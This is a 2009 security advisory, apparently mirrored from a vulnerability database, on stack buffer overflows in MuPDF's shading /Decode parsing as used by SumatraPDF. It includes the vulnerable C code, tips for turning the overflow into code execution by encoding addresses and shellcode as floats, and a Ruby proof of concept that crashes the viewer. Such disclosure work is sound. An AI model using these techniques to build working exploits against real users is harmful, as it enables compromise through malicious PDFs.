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securityvulnsSecurityvulnsSECURITYVULNS:DOC:22845
HistoryNov 30, 2009 - 12:00 a.m.

MuPDF pdf_shade4.c multiple stack-based buffer overflows

2009-11-3000:00:00
vulners.com
9
Description
===========

"MuPDF is a lightweight PDF viewer and toolkit written in portable C".
It is used in particular by SumatraPDF which is a small open-source
PDF viewer for Windows.

MuPDF before commit 20091125231942 did not properly handle /Decode
arrays in a shading of type 4 to 7, leading to a stack-based buffer
overflow. Version 1.0.1 of SumatraPDF integrates this correction and
is no longer vulnerable – it is recommended to upgrade to this version.
In addition, SumatraPDF 1.1 will have DEP enabled permanently on XP/
Vista/7 (through NtSetInformationProcess), as well as being marked
ASLR-compatible.

Timeline
========

2009-11-23 MuPDF and SumatraPDF contacted
2009-11-25 fix integrated
2009-11-28 SumatraPDF 1.0.1 released

Details
=======

The vulnerable code is shown below:

float c0[FZ_MAXCOLORS];
float c1[FZ_MAXCOLORS];


obj = fz_dictgets(shading, "Decode");
if (fz_isarray(obj))
{

for (i=0; i < fz_arraylen(obj) / 2; ++i) {
c0[i] = fz_toreal(fz_arrayget(obj, i2+4));
c1[i] = fz_toreal(fz_arrayget(obj, i
2+5));
}
}

Although SumatraPDF is compiled with /GS, for some reason Visual Studio
2008 failed to flag the vulnerable function. Thus, exploitation is not
particularly difficult, although there are a few tricks:

  • Care must be taken not to overwrite the obj pointer on the stack,
    as it would lead to a crash. Fortunately, the i variable is
    overwritten first, so one can simply increment it to skip obj.

  • The overwritten array handles a bunch of floating point values.
    So all hexadecimal values (such as the overwritten eip) must be
    converted into a floting point value, but not using scientific
    notation because the MuPDf parser cannot handle it.
    For example, 0x33 will be encoded as
    0.000000000000000000000000000000000000000000071

  • All 32-bit chunks of the shellcode need to have a valid floating
    point counterpart: no value must correspond to an IEEE 754 "NaN"
    (not a number). In practice, this can be easily achieved by
    inserting NOPs.

The origami PDF framework (see http://www.security-labs.org/origami/&#41;
may be used to test this vulnerability. The following ruby script creates
a PDF with an oversized /Decode array:

MuPDF pdf_loadtype4shade() PoC code (crash only)

authors: Christophe Devine and Guillaume Delugré

$: << "sources/parser"
require 'parser.rb'
include Origami

sploit = [ 1234 ] * 250

shader = Graphics::Pattern::Shading::FreeFormTriangleMesh.new
shader.ColorSpace = Graphics::Color::Space::DEVICE_RGB
shader.BitsPerCoordinate = 24
shader.BitsPerComponent = 16
shader.BitsPerFlag = 8
shader.Decode = sploit

page = Page.new.add_shading(:kikoo, shader)
page.Contents = ContentStream.new
page.Contents.paint_shading(:kikoo)
PDF.new.append_page(page).saveas('toto.pdf')

How to modify this script to successfully exploit the vulnerability
is left as an exercise for the reader ;) The attached PDF file will
spawn calc.exe when opened with SumatraPDF 1.0; metasploit 3.3 was
used for the creation of the shellcode. This poc will not work with
other versions of SumatraPDF as it uses a jmp esp in the binary.

Greetz
======

#lab, #chaussette, #barbux, hzv, t0ka7a, c+v, al4mbic et pizza_pino